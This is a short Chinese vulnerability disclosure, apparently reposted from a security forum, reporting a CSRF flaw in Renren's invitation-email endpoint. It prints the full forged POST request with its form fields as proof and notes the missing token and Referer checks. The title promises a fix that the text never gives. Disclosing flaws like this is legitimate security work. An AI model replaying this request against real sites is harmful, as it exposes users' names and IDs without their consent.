人人网CSRF用户信息泄露及修复方案 - 网站安全

 

简要描述：人人网某处的CSRF 漏洞 可以导致用户信息泄露

详细说明：人人网向邮箱发送注册邀请的接口没有CSRF防御措施,收到的邮件内有用户的姓名,注册后可以得到用户ID.

漏洞证明：

POST http://invite.renren测试数据/csendMail.do?logid=

 

   Request Headers:

 

      Host[invite.renren测试数据]

 

      User-Agent[Mozilla/5.0 ]

 

      Accept[text/ html ,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]

 

      Accept-Language[zh-cn,zh;q=0.5]

 

      Accept-Encoding[gzip, deflate]

 

      Accept-Charset[UTF-8,*]

 

      Connection[keep-alive]

 

      Referer[http://invite.renren测试数据/cnotin.do?logid=]

 

      Cookie

 

   Post Data:

 

      mail[yourmail@mail测试数据|pz]

 

      importer[]

 

      uAccount[anything@163测试数据]

 

      classcontent[]

 

      action_type[5000]

 

      appId[0]

 

      url[]

 

      app_html[]

 

      inv_id[]

看,没token吧,referer也不管用啊.

 

 

摘自  p.z

查看更多关于人人网CSRF用户信息泄露及修复方案 - 网站安全的详细内容...